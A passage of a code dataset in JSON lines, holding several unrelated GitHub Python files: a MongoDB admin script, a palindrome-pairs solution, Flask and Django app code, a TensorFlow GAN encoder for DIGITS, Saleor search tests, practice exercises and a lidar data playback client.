self.__select(self.TABLES[\"resource.of.link\"],\n \"resource.of.link\")\n\n def delete_routing_table(self):\n self.__delete(self.TABLES[\"domain.routing\"],\n \"domain.routing\")\n\n def delete_ofdatapath_table(self):\n 
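# OF datapaths are stored in the resource.of.node collection\n        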
self.__delete(self.TABLES[\"resource.of.node\"],\n \"resource.of.node\")\n\n def delete_oflink_table(self):\n self.__delete(self.TABLES[\"resource.of.link\"],\n \"resource.of.link\")\n\n def delete_all_tables(self):\n for table, mongo_table in self.TABLES.items():\n self.__delete(mongo_table, table)\n\n\ndef main(argv=None):\n if not argv:\n argv = sys.argv\n\n try:\n bug_reporter_ = ''\n parser_ = argparse.ArgumentParser(\n description='RO Read MongoDB tables',\n epilog='Please, report bugs to ' + bug_reporter_,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser_.add_argument('--action',\n choices=['list_tables',\n 'select_routing_table',\n 'select_ofdatapath_table',\n 'select_oflink_table',\n 'delete_routing_table',\n 'delete_ofdatapath_table',\n 'delete_oflink_table',\n 'delete_all_tables'],\n required=True,\n help='Make an action on (RO) MongoDB')\n\n args_ = parser_.parse_args()\n\n except Exception as ex:\n print(\"Got an exception parsing flags/options: %s\" % ex)\n return False\n\n print(\"Args=%s\" % (args_,))\n try:\n if args_.action == 'list_tables':\n CommandMgr().list_tables()\n elif args_.action == 'select_routing_table':\n CommandMgr().select_routing_table()\n elif args_.action == 'select_ofdatapath_table':\n CommandMgr().select_ofdatapath_table()\n elif args_.action == 'select_oflink_table':\n CommandMgr().select_oflink_table()\n elif args_.action == 'delete_routing_table':\n CommandMgr().delete_routing_table()\n elif args_.action == 'delete_ofdatapath_table':\n CommandMgr().delete_ofdatapath_table()\n elif args_.action == 'delete_oflink_table':\n CommandMgr().delete_oflink_table()\n elif args_.action == 'delete_all_tables':\n CommandMgr().delete_all_tables()\n\n except Exception as e:\n print(\"Got an Exception: %s\" % (str(e)))\n return False\n return True\n\n\nif __name__ == '__main__':\n # update sys-path\n bp_ = os.path.dirname(os.path.dirname(os.path.abspath(sys.argv[0])))\n if bp_ not in [os.path.abspath(x) for x in sys.path]:\n sys.path.insert(0, bp_)\n\n sys.exit(main())\n","repo_name":"dana-i2cat/felix","sub_path":"modules/resource/orchestrator/src/admin/db/action_db.py","file_name":"action_db.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"71127081107","text":"class Solution:\n def palindromePairs(self, words: List[str]) -> List[List[int]]:\n def is_palin(w):\n return True if w == w[::-1] else False\n pre, aft, res = {}, {}, []\n for w in words:\n pre[w], aft[w] = {w[::-1]}, {w[::-1]}\n for i in range(len(w)):\n if is_palin(w[i::-1]): pre[w].add(w[:i:-1])\n if is_palin(w[i:]): \n if i > 0: aft[w].add(w[i-1::-1])\n else: aft[w].add(\"\")\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if words[i] in pre[words[j]] or words[j] in aft[words[i]]: res.append([i, j])\n if words[i] in aft[words[j]] or words[j] in pre[words[i]]: res.append([j, i])\n return res\n","repo_name":"cedricwangyu/LC","sub_path":"336-Palindrome_Pairs.py","file_name":"336-Palindrome_Pairs.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"17086668657","text":"import sys\nimport logging\nfrom flask import Flask\nfrom nomadic.server.routes import routes\n\n\nclass Server():\n \"\"\"handles the web interface and\n refreshing of connected clients.\"\"\"\n\n def __init__(self, port):\n self.app = Flask(__name__,\n static_folder='assets/static',\n 
static_url_path='/static',\n template_folder='assets/templates')\n self.app.register_blueprint(routes)\n self.port = port\n\n # log to stdout\n sh = logging.StreamHandler(sys.stdout)\n self.app.logger.addHandler(sh)\n\n def start(self):\n self.app.run(port=self.port)\n","repo_name":"frnsys/nomadic","sub_path":"nomadic/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"74584433424","text":"# The MIT License (MIT)\r\n#\r\n# Original work Copyright (c) 2016 Taehoon Kim\r\n# Modified work Copyright (c) 2017, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n\r\nimport tensorflow as tf\r\nfrom model import Tower\r\nfrom utils import model_property\r\n\r\nimage_summary = tf.summary.image\r\nscalar_summary = tf.summary.scalar\r\nhistogram_summary = tf.summary.histogram\r\nmerge_summary = tf.summary.merge\r\nSummaryWriter = tf.summary.FileWriter\r\n\r\n\r\nclass batch_norm(object):\r\n \"\"\"\r\n This class creates an op that composes the specified tensor with a batch\r\n normalization layer.\r\n \"\"\"\r\n\r\n def __init__(self, epsilon=1e-5, momentum=0.9, name=\"batch_norm\"):\r\n \"\"\"Instance initialization\"\"\"\r\n with tf.variable_scope(name):\r\n self.epsilon = epsilon\r\n self.momentum = momentum\r\n self.name = name\r\n\r\n def __call__(self, x, train=True):\r\n \"\"\"\r\n Functional interface\r\n\r\n Args:\r\n x: tensor to compose\r\n train: set to True during training and False otherwise\r\n \"\"\"\r\n return tf.contrib.layers.batch_norm(x,\r\n decay=self.momentum,\r\n updates_collections=None,\r\n epsilon=self.epsilon,\r\n scale=True,\r\n is_training=train,\r\n scope=self.name)\r\n\r\n\r\ndef conv2d(input_, output_dim,\r\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"conv2d\"):\r\n \"\"\"\r\n Compose specified symbol with 2D convolution layer\r\n\r\n Args:\r\n input_: tensor to compose. 
Shape: [N, H, W, C]\r\n output_dim: number of output features maps\r\n k_h: kernel height\r\n k_w: kernel width\r\n d_h: horizontal stride\r\n d_w: vertical stride\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n\r\n Returns:\r\n Composed tensor.\r\n \"\"\"\r\n with tf.variable_scope(name):\r\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\r\n initializer=tf.truncated_normal_initializer(stddev=stddev))\r\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\r\n\r\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\r\n conv = tf.nn.bias_add(conv, biases)\r\n\r\n return conv\r\n\r\n\r\ndef deconv2d(input_, output_shape,\r\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\r\n name=\"deconv2d\", with_w=False):\r\n \"\"\"\r\n Compose specified symbol with 2D *transpose* convolution layer\r\n\r\n Args:\r\n input_: tensor to compose. Shape: [N, H, W, C]\r\n output_shape: output shape\r\n k_h: kernel height\r\n k_w: kernel width\r\n d_h: horizontal stride\r\n d_w: vertical stride\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n\r\n Returns:\r\n Composed tensor.\r\n \"\"\"\r\n with tf.variable_scope(name):\r\n # filter : [height, width, output_channels, in_channels]\r\n w = tf.get_variable('w',\r\n [k_h, k_w, output_shape[-1],\r\n input_.get_shape()[-1]],\r\n initializer=tf.random_normal_initializer(stddev=stddev))\r\n deconv = tf.nn.conv2d_transpose(input_, w,\r\n output_shape=output_shape,\r\n strides=[1, d_h, d_w, 1])\r\n\r\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\r\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), output_shape)\r\n\r\n if with_w:\r\n return deconv, w, biases\r\n else:\r\n return deconv\r\n\r\n\r\ndef lrelu(x, leak=0.2, name=\"lrelu\"):\r\n \"\"\"Compose specified tensor with leaky Rectifier Linear Unit\"\"\"\r\n return tf.maximum(x, leak*x)\r\n\r\n\r\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\r\n \"\"\"\r\n Compose specified tensor with linear (fully-connected) layer\r\n\r\n Args:\r\n input_: tensor to compose. Shape: [N, M]\r\n output_size: number of output neurons\r\n scope: name scope\r\n stddev: standard deviation of gaussian distribution to use for random weight initialization\r\n name: name scope\r\n with_w: whether to also return parameter variables\r\n\r\n Returns:\r\n Composed tensor. Shape: [N, output_size]\r\n \"\"\"\r\n shape = input_.get_shape().as_list()\r\n\r\n with tf.variable_scope(scope or \"Linear\"):\r\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\r\n tf.random_normal_initializer(stddev=stddev))\r\n bias = tf.get_variable(\"bias\", [output_size],\r\n initializer=tf.constant_initializer(bias_start))\r\n if with_w:\r\n return tf.matmul(input_, matrix) + bias, matrix, bias\r\n else:\r\n return tf.matmul(input_, matrix) + bias\r\n\r\n\r\nclass UserModel(Tower):\r\n \"\"\"\r\n User Model definition\r\n\r\n DIGITS creates an instance of this class for every tower it needs\r\n to create. This includes:\r\n - one for training,\r\n - one for validation,\r\n - one for testing.\r\n\r\n In the case of multi-GPU training, one training instance is created\r\n for every GPU. 
DIGITS takes care of doing the gradient averaging\r\n across GPUs so this class only needs to define the inference op\r\n and desired loss/cost function.\r\n \"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"\r\n Identify the correct input nodes.\r\n\r\n In the parent class, DIGITS conveniently sets the following fields:\r\n - self.is_training: whether this is a training graph\r\n - self.is_inference: whether this graph is created for inference/testing\r\n - self.x: input node. Shape: [N, H, W, C]\r\n - self.y: label. Shape: [N] for scalar labels, [N, H, W, C] otherwise.\r\n Only defined if self._is_training is True\r\n \"\"\"\r\n super(UserModel, self).__init__(*args, **kwargs)\r\n\r\n image_size = 64\r\n output_size = 64\r\n c_dim = 3\r\n z_dim = 100\r\n\r\n self.dcgan_init(image_size=image_size,\r\n output_size=output_size,\r\n c_dim=c_dim,\r\n z_dim=z_dim)\r\n\r\n @model_property\r\n def inference(self):\r\n \"\"\" op to use for inference \"\"\"\r\n\r\n # scale back to [0, 255] range\r\n images = (self.G * 127) + 128\r\n images_flat = tf.reshape(images, [self.batch_size, self.image_size * self.image_size * self.c_dim])\r\n # concatenate encoded z and generated image into a single flat structure\r\n zgen_flat = tf.reshape(self.DzGEN, [self.batch_size, self.z_dim])\r\n return tf.concat([zgen_flat, images_flat], 1)\r\n\r\n @model_property\r\n def loss(self):\r\n \"\"\"\r\n Loss function\r\n\r\n Returns either an op or a list of dicts.\r\n If the returned value is an op then DIGITS will optimize against this op\r\n with respect to all trainable variables.\r\n If the returned value is a list then DIGITS will optimize against each\r\n loss in the list with respect to the specified variables.\r\n \"\"\"\r\n\r\n # here we are returning a list because we want to alternately optimize the\r\n # discriminator and the generator.\r\n\r\n losses = [\r\n {'loss': self.dzgen_loss, 'vars': self.d_vars},\r\n ]\r\n return losses\r\n\r\n def dcgan_init(self,\r\n image_size,\r\n output_size,\r\n z_dim,\r\n c_dim,\r\n gf_dim=64,\r\n df_dim=64,\r\n gfc_dim=1024,\r\n dfc_dim=1024):\r\n \"\"\"\r\n\r\n Args:\r\n output_size: (optional) The resolution in pixels of the images. [64]\r\n z_dim: (optional) Dimension of dim for Z. [100]\r\n gf_dim: (optional) Dimension of gen filters in first conv layer. [64]\r\n df_dim: (optional) Dimension of discrim filters in first conv layer. [64]\r\n gfc_dim: (optional) Dimension of gen units for for fully connected layer. [1024]\r\n dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]\r\n c_dim: (optional) Dimension of image color. For grayscale input, set to 1. 
[3]\r\n        \"\"\"\r\n        self.image_size = image_size\r\n        self.output_size = output_size\r\n\r\n        self.z_dim = z_dim\r\n\r\n        self.gf_dim = gf_dim\r\n        self.df_dim = df_dim\r\n\r\n        self.gfc_dim = gfc_dim\r\n        self.dfc_dim = dfc_dim\r\n\r\n        self.c_dim = c_dim\r\n\r\n        self.batch_size = tf.shape(self.x)[0]\r\n\r\n        self.soft_label_margin = 0.1\r\n\r\n        # batch normalization : deals with poor initialization helps gradient flow\r\n        self.d_bn1 = batch_norm(name='d_bn1')\r\n        self.d_bn2 = batch_norm(name='d_bn2')\r\n        self.d_bn3 = batch_norm(name='d_bn3')\r\n\r\n        self.g_bn0 = batch_norm(name='g_bn0')\r\n        self.g_bn1 = batch_norm(name='g_bn1')\r\n        self.g_bn2 = batch_norm(name='g_bn2')\r\n        self.g_bn3 = batch_norm(name='g_bn3')\r\n\r\n        self.build_model()\r\n\r\n    def build_model(self):\r\n\r\n        # reshape/rescale x\r\n        self.images = (tf.reshape(self.x, shape=[self.batch_size,\r\n                                                 self.image_size,\r\n                                                 self.image_size,\r\n                                                 self.c_dim],\r\n                                  name='x_reshaped') - 128) / 127.\r\n\r\n        # create discriminator/encoder\r\n        self.DzGEN, self.D_logits = self.discriminator(self.images, reuse=False)\r\n        # create generator\r\n        self.G = self.generator(self.DzGEN)\r\n        # loss is now L2 distance between input image and generator output\r\n        self.dzgen_loss = tf.reduce_mean(tf.square(self.G - self.images), name=\"loss_DzGEN\")\r\n\r\n        # debug\r\n        self.summaries.append(image_summary(\"G\", self.G, max_outputs=3))\r\n        self.summaries.append(image_summary(\"X\", self.images, max_outputs=3))\r\n        self.summaries.append(histogram_summary(\"G_hist\", self.G))\r\n        self.summaries.append(histogram_summary(\"X_hist\", self.images))\r\n        self.summaries.append(scalar_summary(\"DzGen_loss\", self.dzgen_loss))\r\n\r\n        # all trainable variables\r\n        t_vars = tf.trainable_variables()\r\n        # d variables\r\n        self.d_vars = [var for var in t_vars if 'd_' in var.name]\r\n\r\n    def discriminator(self, image, y=None, reuse=False):\r\n        \"\"\"\r\n        Create the discriminator\r\n\r\n        This creates a string of layers:\r\n        - input - [N, 64, 64, 3]\r\n        - conv layer with 64 5x5 kernels and 2x2 stride - [N, 32, 32, 64]\r\n        - leaky relu - [N, 32, 32, 64]\r\n        - conv layer with 128 5x5 kernels and 2x2 stride - [N, 16, 16, 128]\r\n        - batch norm - [N, 16, 16, 128]\r\n        - leaky relu - [N, 16, 16, 128]\r\n        - conv layer with 256 5x5 kernels and 2x2 stride - [N, 8, 8, 256]\r\n        - batch norm - [N, 8, 8, 256]\r\n        - leaky relu - [N, 8, 8, 256]\r\n        - conv layer with 512 5x5 kernels and 2x2 stride - [N, 4, 4, 512]\r\n        - batch norm - [N, 4, 4, 512]\r\n        - leaky relu - [N, 4, 4, 512]\r\n        - flatten - [N, 8192]\r\n        - linear layer with z_dim output neurons - [N, z_dim]\r\n\r\n        Args:\r\n            image: batch of input images - shape: [N, H, W, C]\r\n            y: batch of one-hot encoded labels - shape: [N, K]\r\n            reuse: whether to re-use previously created variables\r\n        \"\"\"\r\n\r\n        # NOTE: although we are really creating an encoder here we need to re-use the same\r\n        # variable scope (i.e. 
\"discriminator\") as in the original GAN so we can re-use\r\n # learned parameters\r\n with tf.variable_scope(\"discriminator\") as scope:\r\n if reuse:\r\n scope.reuse_variables()\r\n\r\n h0 = lrelu(conv2d(image, self.df_dim, name='d_h0_conv'))\r\n h1 = lrelu(self.d_bn1(conv2d(h0, self.df_dim*2, name='d_h1_conv'), train=self.is_training))\r\n h2 = lrelu(self.d_bn2(conv2d(h1, self.df_dim*4, name='d_h2_conv'), train=self.is_training))\r\n h3 = lrelu(self.d_bn3(conv2d(h2, self.df_dim*8, name='d_h3_conv'), train=self.is_training))\r\n h3_size = ((self.output_size // 16) ** 2) * self.df_dim * 8\r\n h4 = linear(tf.reshape(h3, [self.batch_size, h3_size]), self.z_dim, 'd_h3_lin_retrain')\r\n return h4, h4\r\n\r\n def generator(self, z, y=None):\r\n \"\"\"\r\n Create the generator\r\n\r\n This creates a string of layers:\r\n - input - [N, 100]\r\n - linear layer with 8192 output neurons - [N, 8192]\r\n - reshape - [N, 4, 4, 512]\r\n - batch norm - [N, 4, 4, 512]\r\n - relu - [N, 4, 4, 512]\r\n - transpose convolution with 256 filters and stride 2 - [N, 8, 8, 256]\r\n - batch norm - [N, 8, 8, 256]\r\n - relu - [N, 8, 8, 256]\r\n - transpose convolution with 128 filters and stride 2 - [N, 16, 16, 128]\r\n - batch norm - [N, 16, 16, 128]\r\n - relu - [N, 16, 16, 128]\r\n - transpose convolution with 64 filters and stride 2 - [N, 32, 32, 64]\r\n - batch norm - [N, 32, 32, 64]\r\n - relu - [N, 32, 32, 64]\r\n - transpose convolution with 3 filters and stride 2 - [N, 64, 64, 3]\r\n - tanh - [N, 64, 64, 3]\r\n \"\"\"\r\n with tf.variable_scope(\"generator\"):\r\n s = self.output_size\r\n s2, s4, s8, s16 = int(s/2), int(s/4), int(s/8), int(s/16)\r\n\r\n # project `z` and reshape\r\n self.z_, self.h0_w, self.h0_b = linear(z, self.gf_dim*8*s16*s16, 'g_h0_lin', with_w=True)\r\n\r\n self.h0 = tf.reshape(self.z_, [-1, s16, s16, self.gf_dim * 8])\r\n h0 = tf.nn.relu(self.g_bn0(self.h0, train=False))\r\n\r\n self.h1, self.h1_w, self.h1_b = deconv2d(h0, [self.batch_size, s8, s8, self.gf_dim*4],\r\n name='g_h1', with_w=True)\r\n h1 = tf.nn.relu(self.g_bn1(self.h1, train=False))\r\n\r\n h2, self.h2_w, self.h2_b = deconv2d(h1, [self.batch_size, s4, s4, self.gf_dim*2],\r\n name='g_h2', with_w=True)\r\n h2 = tf.nn.relu(self.g_bn2(h2, train=False))\r\n\r\n h3, self.h3_w, self.h3_b = deconv2d(h2, [self.batch_size, s2, s2, self.gf_dim*1],\r\n name='g_h3', with_w=True)\r\n h3 = tf.nn.relu(self.g_bn3(h3, train=False))\r\n\r\n h4, self.h4_w, self.h4_b = deconv2d(h3, [self.batch_size, s, s, self.c_dim],\r\n name='g_h4', with_w=True)\r\n\r\n return tf.nn.tanh(h4)\r\n","repo_name":"NVIDIA/DIGITS","sub_path":"examples/gan/network-celebA-encoder.py","file_name":"network-celebA-encoder.py","file_ext":"py","file_size_in_byte":16138,"program_lang":"python","lang":"en","doc_type":"code","stars":4106,"dataset":"github-code","pt":"48"} +{"seq_id":"73156028627","text":"from ...attribute import AttributeInputType, AttributeType\nfrom ...attribute.models import Attribute, AttributeValue\nfrom ...attribute.utils import associate_attribute_values_to_instance\nfrom ...core.utils.editorjs import clean_editor_js\nfrom ..models import Product, ProductVariant\nfrom ..search import (\n prepare_product_search_document_value,\n update_product_search_document,\n update_products_search_document,\n)\n\n\ndef test_update_product_search_document(product_type, category):\n # given\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-111\",\n product_type=product_type,\n 
category=category,\n description_plaintext=description,\n )\n assert not product.search_document\n\n # when\n update_product_search_document(product)\n\n # then\n assert f\"{name}\\n{description}\\n\".lower() in product.search_document\n\n\ndef test_update_products_search_document(product_list):\n # given\n for product in product_list:\n product.search_document = \"\"\n Product.objects.bulk_update(product_list, [\"search_document\"])\n\n # when\n update_products_search_document(Product.objects.all())\n\n # then\n for product in product_list:\n product.refresh_from_db()\n assert product.search_document\n\n\ndef test_prepare_product_search_document_value_empty_product(product_type, category):\n # given\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-11\",\n product_type=product_type,\n category=category,\n description_plaintext=description,\n )\n\n # when\n search_document_value = prepare_product_search_document_value(product)\n\n # then\n assert search_document_value == f\"{name}\\n{description}\\n\".lower()\n\n\ndef test_prepare_product_search_document_value(\n category,\n product_type,\n rich_text_attribute_with_many_values,\n date_time_attribute,\n date_attribute,\n color_attribute,\n size_attribute,\n numeric_attribute,\n):\n # given\n multiselect_attribute = Attribute.objects.create(\n slug=\"modes\",\n name=\"Available Modes\",\n input_type=AttributeInputType.MULTISELECT,\n type=AttributeType.PRODUCT_TYPE,\n )\n\n multiselect_attr_val_1 = AttributeValue.objects.create(\n attribute=multiselect_attribute, name=\"Eco Mode\", slug=\"eco\"\n )\n multiselect_attr_val_2 = AttributeValue.objects.create(\n attribute=multiselect_attribute, name=\"Performance Mode\", slug=\"power\"\n )\n\n name = \"Test product\"\n description = \"Test description\"\n product = Product.objects.create(\n name=name,\n slug=\"test-product-11\",\n product_type=product_type,\n category=category,\n description_plaintext=description,\n )\n\n product_type.product_attributes.add(\n rich_text_attribute_with_many_values,\n date_time_attribute,\n color_attribute,\n numeric_attribute,\n )\n rich_text_val_1 = rich_text_attribute_with_many_values.values.first()\n date_time_value = date_time_attribute.values.first()\n color_attribute_value = color_attribute.values.first()\n numeric_attribute_value = numeric_attribute.values.first()\n associate_attribute_values_to_instance(\n product, rich_text_attribute_with_many_values, rich_text_val_1\n )\n associate_attribute_values_to_instance(\n product, date_time_attribute, date_time_value\n )\n associate_attribute_values_to_instance(\n product, color_attribute, color_attribute_value\n )\n associate_attribute_values_to_instance(\n product, numeric_attribute, numeric_attribute_value\n )\n\n variant = ProductVariant.objects.create(product=product, sku=\"123\")\n product_type.variant_attributes.add(\n rich_text_attribute_with_many_values,\n date_attribute,\n size_attribute,\n multiselect_attribute,\n )\n rich_text_val_2 = rich_text_attribute_with_many_values.values.last()\n size_attribute_value = size_attribute.values.first()\n date_attribute_value = date_attribute.values.first()\n associate_attribute_values_to_instance(\n variant, rich_text_attribute_with_many_values, rich_text_val_2\n )\n associate_attribute_values_to_instance(\n variant, size_attribute, size_attribute_value\n )\n associate_attribute_values_to_instance(\n variant, date_attribute, date_attribute_value\n )\n\n variant_2 = 
ProductVariant.objects.create(product=product, sku=\"123ABC\")\n    associate_attribute_values_to_instance(\n        variant_2, multiselect_attribute, multiselect_attr_val_1, multiselect_attr_val_2\n    )\n\n    # when\n    search_document_value = prepare_product_search_document_value(product)\n\n    # then\n    assert f\"{name}\\n{description}\\n\".lower() in search_document_value\n    assert variant.sku.lower() in search_document_value\n    assert variant_2.sku.lower() in search_document_value\n\n    # check if product attributes are in search_document_value\n    assert (\n        clean_editor_js(rich_text_val_1.rich_text, to_string=True).lower()\n        in search_document_value\n    )\n    assert date_time_value.date_time.isoformat().lower() in search_document_value\n    assert color_attribute_value.name.lower() in search_document_value\n    assert (\n        f\"{numeric_attribute_value.name}{numeric_attribute.unit}\"\n        in search_document_value\n    )\n\n    # check if variant attributes are in search_document_value\n    assert (\n        clean_editor_js(rich_text_val_2.rich_text, to_string=True).lower()\n        in search_document_value\n    )\n    assert size_attribute_value.name.lower() in search_document_value\n    assert date_attribute_value.date_time.isoformat().lower() in search_document_value\n    assert multiselect_attr_val_1.name.lower() in search_document_value\n    assert multiselect_attr_val_2.name.lower() in search_document_value\n","repo_name":"cong1912/tien-shop","sub_path":"saleor/saleor/product/tests/test_product_search.py","file_name":"test_product_search.py","file_ext":"py","file_size_in_byte":5960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"71465020625","text":"\ndef gg(fun):\n    def hifi():\n        print(\"hifi\")\n        fun()\n        print(\"done\")\n    return hifi\n@gg\ndef hi():\n    print(\"hi, something happened\")\n    \nhi()\n\n\ndef ap(x,v):\n    x.append(55)\n    v=v+5\n    \nl=[45]\nv = 5\nap(l,v)\nprint(l,v)\n\ndef fibbo(n):\n    if n==0:\n        return 0\n    if n==1:\n        return 1\n    ans = fibbo(n-1)+fibbo(n-2)\n    return ans\nfor i in range(16):\n    print(fibbo(i))\n    \ndef saydigit(n,arr):\n    if n== 0:\n        return\n    num = n %10\n    n=n//10\n    \n    \n    saydigit(n,arr)\n    print(arr[num] , end=\" \")\n    \nn = 456\narr = ['zero','one','two','three','four','five','six','seven','eight','nine']\nsaydigit(n,arr)","repo_name":"vivekvinchhi/python-practical-sets","sub_path":"dsa/sfvs.py","file_name":"sfvs.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"35211017172","text":"\"\"\"\nA client that receives lidar data from the server and simply draws it.\nIt also plays back the camera footage that was logged at the matching time.\n2018-11\n\"\"\"\nimport socket\nimport numpy as np\nimport cv2\nimport threading\nimport time\n\nHOST = '127.0.0.1'\nPORT = 10018\nBUFF = 57600\ntimeLabel = \"2018-11-04-17-01-16\"\nMESG = timeLabel + \".txt\"\nRAD = 500\n\nflag = [False]\n\ndata_list = None\nstop = False\n\ncap_left = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\leftcam\\\\\" + timeLabel + \".avi\")\ncap_mid = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\signcam\\\\\" + timeLabel + \".avi\")\ncap_right = cv2.VideoCapture(\"c:\\\\pams-skku-data\\\\rightcam\\\\\" + timeLabel + \".avi\")\n\nsock_lidar = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock_lidar.connect((HOST, PORT))\n\nsock_lidar.send(MESG.encode())\n\nwhile True:\n    _, left = cap_left.read()\n    _, mid = cap_mid.read()\n    _, right = cap_right.read()\n\n    cv2.imshow('left', left)\n    cv2.imshow('right', right)\n    cv2.imshow('mid', mid)\n\n    current_frame = np.zeros((RAD, RAD * 2), np.uint8)\n    points 
= np.full((361, 2), -1000, int)  # array of (x, y) points to draw, pre-filled with -1000 (far away)\n    data = sock_lidar.recv(BUFF).decode()\n\n    if data.__contains__('sEA'):\n        continue\n\n    temp = data.split(' ')[116:477]\n\n    try:\n        data_list = [int(item, 16) for item in temp]\n        for theta in range(0, 361):\n            r = data_list[theta] / 10  # distance from the car to the obstacle, in cm\n\n            if 2 <= r:  # ignore noise right in front of the lidar (r < 2 cm)\n\n                # convert r-theta to x-y (real-world position, in cm)\n                x = r * np.cos(np.radians(0.5 * theta))\n                y = r * np.sin(np.radians(0.5 * theta))\n\n                # coordinate transform: fit into screen coordinates ((0, 0) at top left)\n                points[theta][0] = round(x) + RAD\n                points[theta][1] = RAD - round(y)\n        for point in points:  # for each obstacle point\n            cv2.circle(current_frame, tuple(point), 2, 255, -1)  # draw a dot on the canvas\n        cv2.imshow(\"LiDAR\", current_frame)\n        if cv2.waitKey(1) & 0xff == ord(' '): break\n    except Exception:\n        pass\n","repo_name":"HongBeenKim/pams-skku","sub_path":"data_logging_set/play_data_client.py","file_name":"play_data_client.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"ko","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"}
{"seq_id":"29674668846","text":"from django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.exceptions import PermissionDenied\n\nfrom django.urls import reverse_lazy\nfrom django.utils import timezone\nfrom django.views.generic import ListView, CreateView, UpdateView, TemplateView, DetailView\n\nfrom fifawc.users.models import User\nfrom match.forms import MatchForm\nfrom prediction.forms import PredictionForm\nfrom prediction.models import Prediction\nfrom .models import Country, Match\n\n\nclass LandingView(TemplateView):\n    template_name = 'pages/home.html'\n\n    def get_context_data(self, **kwargs):\n        ctx = super().get_context_data(**kwargs)\n        ctx['users'] = User.objects.all()\n        return ctx\n\n\nclass CountryListView(LoginRequiredMixin, ListView):\n    model = Country\n    template_name = 'match/country/list.html'\n    queryset = Country.objects.all().order_by('group').values('name', 'flag_image', 'group')\n\n\nclass MatchList(LoginRequiredMixin, ListView):\n    model = Match\n    template_name = 'match/match/list.html'\n    queryset = model.objects.select_related('home', 'away', 'outcome', 'outcome__winning_team').order_by('-start_time')\n\n\nclass CreateMatch(LoginRequiredMixin, CreateView):\n    model = Match\n    template_name = 'match/match/form.html'\n    form_class = MatchForm\n    success_url = reverse_lazy('match:match-list')\n    success_message = \"Successfully created match.\"\n\n    def dispatch(self, request, *args, **kwargs):\n        if not self.request.user.is_superuser:\n            raise PermissionDenied\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        messages.success(self.request, self.success_message)\n        return self.success_url\n\n\nclass UpdateMatch(LoginRequiredMixin, UpdateView):\n    model = Match\n    template_name = 'match/match/form.html'\n    form_class = MatchForm\n    success_url = reverse_lazy('match:match-list')\n    success_message = \"Successfully updated match.\"\n\n    def dispatch(self, request, *args, **kwargs):\n        if not self.request.user.is_superuser:\n            raise PermissionDenied\n        return super().dispatch(request, *args, **kwargs)\n\n    def get_success_url(self):\n        messages.success(self.request, self.success_message)\n        return self.success_url\n\n\nclass MatchDetailOverview(LoginRequiredMixin, DetailView):\n    model = Match\n    template_name = 'match/match/detail.html'\n    queryset = model.objects.select_related('outcome', 'outcome__most_foul', 'home', 
